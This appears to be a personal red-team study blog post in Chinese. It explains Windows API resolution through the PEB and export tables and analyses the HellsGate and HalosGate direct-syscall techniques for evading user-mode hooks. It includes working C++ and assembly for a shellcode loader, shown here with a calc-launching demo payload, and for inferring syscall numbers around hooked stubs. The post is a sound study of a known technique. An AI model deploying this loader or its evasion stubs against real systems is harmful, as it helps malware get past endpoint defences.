<!DOCTYPE html>
<html lang="en" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="John Doe" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  
  
  <title>
    
      syscall免杀学习记录(持续更新) 
      
      
      |
    
     1cfh&#39;Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/hacker.jpg">
    <link rel="icon" href="/images/hacker.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 7.0.0"><link rel="alternate" href="/atom.xml" title="1cfh'Blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/tou.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/"></a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">Friends</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">syscall免杀学习记录(持续更新)</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
          2024-04-15 19:34:56
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="Tags"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/RedTeam/" title="RedTeam">
                    #RedTeam
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h1 id="PEB等结构"><a href="#PEB等结构" class="headerlink" title="PEB等结构"></a>PEB等结构</h1><p>神图</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202404151932890.jpeg" alt="img"></p>
<h1 id="Windows中的API调用机制"><a href="#Windows中的API调用机制" class="headerlink" title="Windows中的API调用机制"></a>Windows中的API调用机制</h1><p>简单来说，Ring3中的kernel32.dll中的函数会调用ntdll.dll中的函数，在ntdll.dll中使用syscall指令从Ring3进入Ring0</p>
<ul>
<li>测试：</li>
</ul>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202404151932807.png" alt="image-20240307154434280"></p>
<p>可以发现创建线程</p>
<p><code>kernel32.dll</code>的<code>CreateThread</code>  &#x3D;&gt; <code>KernelBase.dll</code>的<code>CreateRemoteThreadEx</code> &#x3D;&gt; <code>ntdll.dll</code>的<code>NtCreateThreadEx</code></p>
<p><code>ntdll.dll</code>中相当于保存着执行功能的函数以及系统调用存根，<code>ntdll.dll</code>导出<code>Windows Native API</code>，具体实现在内核态中的<code>ntoskrnl.exe</code>中</p>
<ul>
<li>使用IDA查看ntdll.dll</li>
</ul>
<p>NtCreateThreadEx</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202404151933315.png" alt="image-20240412093259939"></p>
<h1 id="Windows中定位API的原理"><a href="#Windows中定位API的原理" class="headerlink" title="Windows中定位API的原理"></a>Windows中定位API的原理</h1><p>​	定位WinAPI对于开发通用shellcode有着重要意义。</p>
<p>​	而WinAPI通过动态链接库中的导出函数（可以查看导出表Export Directory）来实现的，比如内存操作等API在kernel32.dll中实现，GUI的相关API在user32.dll中实现。</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202404151933819.png" alt="image-20240413132824494"></p>
<p>​	win32下的shellcode开发通常使用<code>TEB-&gt;PEB-&gt;LDR</code>的思路来找到，具体过程如下：</p>
<ul>
<li><p>通过段选择器FS在内存中找到线程环境块TEB</p>
</li>
<li><p>线程环境块偏移位置为0x30的位置 或者 直接通过GS段寄存器0x30偏移处 获取PEB指针</p>
</li>
</ul>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202404151933811.png" alt="image-20240413133603759"></p>
<ul>
<li>PEB中偏移位置为0x0C的位置存放着PEB_LDR_DATA结构体的指针，其中存放着被进程装载的动态链接库的信息</li>
</ul>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202404151933512.png" alt="image-20240413133948094"></p>
<ul>
<li>PEB_LDR_DATA结构体中存放着三条链表，这均可以获取API</li>
</ul>
<p><img src="C:\Users\14537\AppData\Roaming\Typora\typora-user-images\image-20240413134235247.png" alt="image-20240413134235247"></p>
<p>以InlnitializationOrderModuleList为例：</p>
<p>​	模块初始化链表InlnitializationOrderModuleList中按顺序存放着PE装入运行时初始化模块的信息，第一个链表结点是ntdll.dll，第二个链表结点就是kernel32.dll</p>
<p>​	到对应模块后，在InInitializationOrderModuleList的0x08偏移处就是ntdll.dll的基址</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202404151933234.png" alt="image-20240413134602172"></p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202404151933799.png"></p>
<h1 id="syscall免杀"><a href="#syscall免杀" class="headerlink" title="syscall免杀"></a>syscall免杀</h1><h2 id="HellsGate"><a href="#HellsGate" class="headerlink" title="HellsGate"></a>HellsGate</h2><h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>读取ntdll.dll，解析并遍历ntdll.dll的导出表，然后根据函数名取出函数地址，再用函数指针的方式进行syscall调用，从而绕过Ring3上的hook检测</p>
<h3 id="源码分析"><a href="#源码分析" class="headerlink" title="源码分析"></a>源码分析</h3><ul>
<li>获取ldrDataEntry的基址</li>
</ul>
<p>​	HellsGate的作者从InMemoryOrderModuleList出发，最后偏移0x10个字节即可</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb-&gt;LoaderData-&gt;InMemoryOrderModuleList.Flink-&gt;Flink - <span class="number">0x10</span>);</span><br></pre></td></tr></table></figure>

<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202404151933799.png"></p>
<ul>
<li>获得ntdll.dll的EAT（Export Address Table）的基地址</li>
</ul>
<p>​	这个的前置知识就是PE文件结构</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202404151933676.jpeg" alt="img"></p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">BOOL <span class="title">GetImageExportDirectory</span><span class="params">(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory)</span> </span>&#123;</span><br><span class="line">	<span class="comment">// Get DOS header</span></span><br><span class="line">	PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;</span><br><span class="line">	<span class="keyword">if</span> (pImageDosHeader-&gt;e_magic != IMAGE_DOS_SIGNATURE) &#123;</span><br><span class="line">		<span class="keyword">return</span> FALSE;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Get NT headers</span></span><br><span class="line">	PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader-&gt;e_lfanew);</span><br><span class="line">	<span class="keyword">if</span> (pImageNtHeaders-&gt;Signature != IMAGE_NT_SIGNATURE) &#123;</span><br><span class="line">		<span class="keyword">return</span> FALSE;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Get the EAT</span></span><br><span class="line">	*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders-&gt;OptionalHeader.DataDirectory[<span class="number">0</span>].VirtualAddress);</span><br><span class="line">	<span class="keyword">return</span> TRUE;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<ul>
<li>通过API哈希然后遍历ntdll.dll的EAT来找到对应的函数地址</li>
</ul>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">Table.NtAllocateVirtualMemory.dwHash = <span class="number">0xf5bd373480a6b89b</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="built_in">GetVxTableEntry</span>(pLdrDataEntry-&gt;DllBase, pImageExportDirectory, &amp;Table.NtAllocateVirtualMemory))</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0x1</span>;</span><br><span class="line"></span><br><span class="line">Table.NtCreateThreadEx.dwHash = <span class="number">0x64dc7db288c5015f</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="built_in">GetVxTableEntry</span>(pLdrDataEntry-&gt;DllBase, pImageExportDirectory, &amp;Table.NtCreateThreadEx))</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0x1</span>;</span><br><span class="line"></span><br><span class="line">Table.NtProtectVirtualMemory.dwHash = <span class="number">0x858bcb1046fb6a37</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="built_in">GetVxTableEntry</span>(pLdrDataEntry-&gt;DllBase, pImageExportDirectory, &amp;Table.NtProtectVirtualMemory))</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0x1</span>;</span><br><span class="line"></span><br><span class="line">Table.NtWaitForSingleObject.dwHash = <span class="number">0xc6a2fa174e551bcb</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="built_in">GetVxTableEntry</span>(pLdrDataEntry-&gt;DllBase, pImageExportDirectory, &amp;Table.NtWaitForSingleObject))</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0x1</span>;</span><br></pre></td></tr></table></figure>





<ul>
<li>最后使用从ntdll.dll的EAT中获取的winAPI执行shellcode</li>
</ul>
<blockquote>
<p>分配内存页存储shellcode –&gt; 往内存页中写入shellcode –&gt; 修改内存页为可读可执行 –&gt; 在当前进程中创建新的线程 –&gt; 执行</p>
</blockquote>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">BOOL <span class="title">Payload</span><span class="params">(PVX_TABLE pVxTable)</span> </span>&#123;</span><br><span class="line">	NTSTATUS status = <span class="number">0x00000000</span>;</span><br><span class="line">	<span class="comment">// char shellcode[] = &quot;\x90\x90\x90\x90\xcc\xcc\xcc\xcc\xc3&quot;;</span></span><br><span class="line">	<span class="type">char</span> shellcode[] = <span class="string">&quot;\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50&quot;</span></span><br><span class="line"><span class="string">&quot;\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52&quot;</span></span><br><span class="line"><span class="string">&quot;\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a&quot;</span></span><br><span class="line"><span class="string">&quot;\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41&quot;</span></span><br><span class="line"><span class="string">&quot;\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52&quot;</span></span><br><span class="line"><span class="string">&quot;\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48&quot;</span></span><br><span class="line"><span class="string">&quot;\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40&quot;</span></span><br><span class="line"><span class="string">&quot;\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48&quot;</span></span><br><span class="line"><span class="string">&quot;\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41&quot;</span></span><br><span class="line"><span class="string">&quot;\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1&quot;</span></span><br><span class="line"><span class="string">&quot;\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c&quot;</span></span><br><span class="line"><span class="string">&quot;\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01&quot;</span></span><br><span class="line"><span class="string">&quot;\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a&quot;</span></span><br><span class="line"><span class="string">&quot;\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b&quot;</span></span><br><span class="line"><span class="string">&quot;\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00&quot;</span></span><br><span class="line"><span class="string">&quot;\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b&quot;</span></span><br><span class="line"><span class="string">&quot;\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd&quot;</span></span><br><span class="line"><span class="string">&quot;\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0&quot;</span></span><br><span class="line"><span class="string">&quot;\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff&quot;</span></span><br><span class="line"><span class="string">&quot;\xd5\x63\x61\x6c\x63\x00&quot;</span>;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Allocate memory for the shellcode</span></span><br><span class="line">	PVOID lpAddress = <span class="literal">NULL</span>;</span><br><span class="line">	SIZE_T sDataSize = <span class="built_in">sizeof</span>(shellcode);</span><br><span class="line">	<span class="built_in">HellsGate</span>(pVxTable-&gt;NtAllocateVirtualMemory.wSystemCall);</span><br><span class="line">	status = <span class="built_in">HellDescent</span>((HANDLE)<span class="number">-1</span>, &amp;lpAddress, <span class="number">0</span>, &amp;sDataSize, MEM_COMMIT, PAGE_READWRITE);</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Write Memory</span></span><br><span class="line">	<span class="built_in">VxMoveMemory</span>(lpAddress, shellcode, <span class="built_in">sizeof</span>(shellcode));</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Change page permissions</span></span><br><span class="line">	ULONG ulOldProtect = <span class="number">0</span>;</span><br><span class="line">	<span class="built_in">HellsGate</span>(pVxTable-&gt;NtProtectVirtualMemory.wSystemCall);</span><br><span class="line">	status = <span class="built_in">HellDescent</span>((HANDLE)<span class="number">-1</span>, &amp;lpAddress, &amp;sDataSize, PAGE_EXECUTE_READ, &amp;ulOldProtect);</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Create thread</span></span><br><span class="line">	HANDLE hHostThread = INVALID_HANDLE_VALUE;</span><br><span class="line">	<span class="built_in">HellsGate</span>(pVxTable-&gt;NtCreateThreadEx.wSystemCall);		</span><br><span class="line">	status = <span class="built_in">HellDescent</span>(&amp;hHostThread, <span class="number">0x1FFFFF</span>, <span class="literal">NULL</span>, (HANDLE)<span class="number">-1</span>, (LPTHREAD_START_ROUTINE)lpAddress, <span class="literal">NULL</span>, FALSE, <span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Wait for 1 seconds</span></span><br><span class="line">	LARGE_INTEGER Timeout;</span><br><span class="line">	Timeout.QuadPart = <span class="number">-10000000</span>;</span><br><span class="line">	<span class="built_in">HellsGate</span>(pVxTable-&gt;NtWaitForSingleObject.wSystemCall);</span><br><span class="line">	status = <span class="built_in">HellDescent</span>(hHostThread, FALSE, &amp;Timeout);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">return</span> TRUE;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>顺道看下HellsGate的汇编代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">.code </span><br><span class="line">	HellsGate PROC			; 获取系统调用号</span><br><span class="line">		mov wSystemCall, 000h</span><br><span class="line">		mov wSystemCall, ecx			</span><br><span class="line">		ret</span><br><span class="line">	HellsGate ENDP</span><br><span class="line">	</span><br><span class="line">	HellDescent PROC		; 系统调用，可以参考ntdll.dll中的反汇编代码</span><br><span class="line">		mov r10, rcx</span><br><span class="line">		mov eax, wSystemCall</span><br><span class="line"></span><br><span class="line">		syscall</span><br><span class="line">		ret</span><br><span class="line">	HellDescent ENDP</span><br><span class="line">end</span><br></pre></td></tr></table></figure>





<h2 id="HalosGate"><a href="#HalosGate" class="headerlink" title="HalosGate"></a>HalosGate</h2><p>HellsGate的缺点是它定位API时需要一个没有经过任何hook的ntdll.dll，因为获取API时的偏移都是硬编码的</p>
<p>倘如ntdll.dll被hook时，那么HalosGate就失效了，为了解决这个问题，HalosGate应运而生</p>
<p>光环之门的基本原理就是找到未被hook的系统调用，根据系统调用号的临近关系进行推测</p>
<p>重点看下findSyscallNumber、halosGateUp、halosGateDown这几个函数</p>
<ul>
<li>findSyscallNumber</li>
</ul>
<p>在jne error处检查是否被hook，如果没有则返回syscall号，源代码中不启用光环之门，而是继续地狱之门</p>
<p><code>cmp edi, [rcx]</code>：检查是否被hook如果有则返回error，启用光环之门</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">findSyscallNumber PROC</span><br><span class="line">	xor rsi, rsi</span><br><span class="line">	xor rdi, rdi </span><br><span class="line">	mov rsi, 00B8D18B4Ch   ; bytes at start of NTDLL stub to setup syscall in RAX</span><br><span class="line">	mov edi, [rcx]         ; RDI = first 4 bytes of NTDLL API syscall stub (mov r10,rcx;mov eax,&lt;syscall#&gt;)</span><br><span class="line">	cmp rsi, rdi</span><br><span class="line">	jne error              ; if the bytes dont match then its prob hooked. Exit gracefully</span><br><span class="line">	xor rax,rax            ; clear RAX as it will hold the syscall</span><br><span class="line">	mov ax, [rcx+4]        ; The systemcall number</span><br><span class="line">	ret                    ; return to caller</span><br><span class="line">findSyscallNumber ENDP</span><br></pre></td></tr></table></figure>



<ul>
<li>halosGateUp：向上获取SSN</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">halosGateUp PROC</span><br><span class="line">	xor rsi, rsi</span><br><span class="line">	xor rdi, rdi </span><br><span class="line">	mov rsi, 00B8D18B4Ch   ; bytes at start of NTDLL stub to setup syscall in RAX</span><br><span class="line">	xor rax, rax</span><br><span class="line">	mov al, 20h            ; 32 * Increment = Syscall Up</span><br><span class="line">	mul dx                 ; RAX = RAX * RDX = 32 * Syscall Up</span><br><span class="line">	add rcx, rax           ; RCX = NTDLL.API +- Syscall Stub</span><br><span class="line">	mov edi, [rcx]         ; RDI = first 4 bytes of NTDLL API syscall stub, incremented Up by HalosGate (mov r10, rcx; mov eax, &lt;syscall#&gt;)</span><br><span class="line">	cmp rsi, rdi</span><br><span class="line">	jne error              ; if the bytes dont match then its prob hooked. Exit gracefully</span><br><span class="line">	xor rax,rax            ; clear RAX as it will hold the syscall</span><br><span class="line">	mov ax, [rcx+4]        ; The systemcall number for the API close to the target</span><br><span class="line">	ret                    ; return to caller</span><br><span class="line">halosGateUp ENDP</span><br></pre></td></tr></table></figure>



<ul>
<li>halosGateDown：向下获取SSN</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">halosGateDown PROC</span><br><span class="line">	xor rsi, rsi</span><br><span class="line">	xor rdi, rdi </span><br><span class="line">	mov rsi, 00B8D18B4Ch   ; bytes at start of NTDLL stub to setup syscall in RAX</span><br><span class="line">	xor rax, rax</span><br><span class="line">	mov al, 20h            ; 32 * Increment = Syscall Down</span><br><span class="line">	mul dx                 ; RAX = RAX * RDX = 32 * Syscall Down</span><br><span class="line">	sub rcx, rax           ; RCX = NTDLL.API - Syscall Stub</span><br><span class="line">	mov edi, [rcx]         ; RDI = first 4 bytes of NTDLL API syscall stub, incremented Down by HalosGate (mov r10, rcx; mov eax, &lt;syscall#&gt;)</span><br><span class="line">	cmp rsi, rdi</span><br><span class="line">	jne error              ; if the bytes dont match then its prob hooked. Exit gracefully</span><br><span class="line">	xor rax,rax            ; clear RAX as it will hold the syscall</span><br><span class="line">	mov ax, [rcx+4]        ; The systemcall number for the API close to the target</span><br><span class="line">	ret                    ; return to caller</span><br><span class="line">halosGateDown ENDP</span><br></pre></td></tr></table></figure>







<h1 id="参考文献"><a href="#参考文献" class="headerlink" title="参考文献"></a>参考文献</h1><ol>
<li><p><a target="_blank" rel="noopener" href="https://blog.eonew.cn/2018-09-09.%E5%AE%9A%E4%BD%8DAPI%E7%9A%84%E5%8E%9F%E7%90%86.html">https://blog.eonew.cn/2018-09-09.%E5%AE%9A%E4%BD%8DAPI%E7%9A%84%E5%8E%9F%E7%90%86.html</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/12885?time__1311=mqmhq+xjxGED/7NeBKnOQAnxD56D&alichlgref=https://www.google.com/#toc-17">https://xz.aliyun.com/t/12885?time__1311=mqmhq%2BxjxGED%2F7NeBKnOQAnxD56D&amp;alichlgref=https%3A%2F%2Fwww.google.com%2F#toc-17</a></p>
</li>
</ol>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2024/04/10/WriteUp/SDUCTF/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
              2024-04-15 19:34:56
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="Tags"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/RedTeam/" title="RedTeam">
                        #RedTeam
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/2024/04/10/WindowsHacker-InjectionTrick/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#PEB%E7%AD%89%E7%BB%93%E6%9E%84"><span class="toc-text">PEB等结构</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Windows%E4%B8%AD%E7%9A%84API%E8%B0%83%E7%94%A8%E6%9C%BA%E5%88%B6"><span class="toc-text">Windows中的API调用机制</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Windows%E4%B8%AD%E5%AE%9A%E4%BD%8DAPI%E7%9A%84%E5%8E%9F%E7%90%86"><span class="toc-text">Windows中定位API的原理</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#syscall%E5%85%8D%E6%9D%80"><span class="toc-text">syscall免杀</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#HellsGate"><span class="toc-text">HellsGate</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90"><span class="toc-text">源码分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#HalosGate"><span class="toc-text">HalosGate</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%8C%AE"><span class="toc-text">参考文献</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/Ch31sBest">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
        <li>
          
              <a title="rss" href="/atom.xml">
                <i class="iconfont icon-rss"></i>
              </a>
              
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2024 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
    <div class="footer-views">
      
          本站总访问量<span id="busuanzi_value_site_pv"></span>次
        
      
          本文总阅读量<span id="busuanzi_value_page_pv"></span>次
        
      
          本站访客数<span id="busuanzi_value_site_uv"></span>人
        
      
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
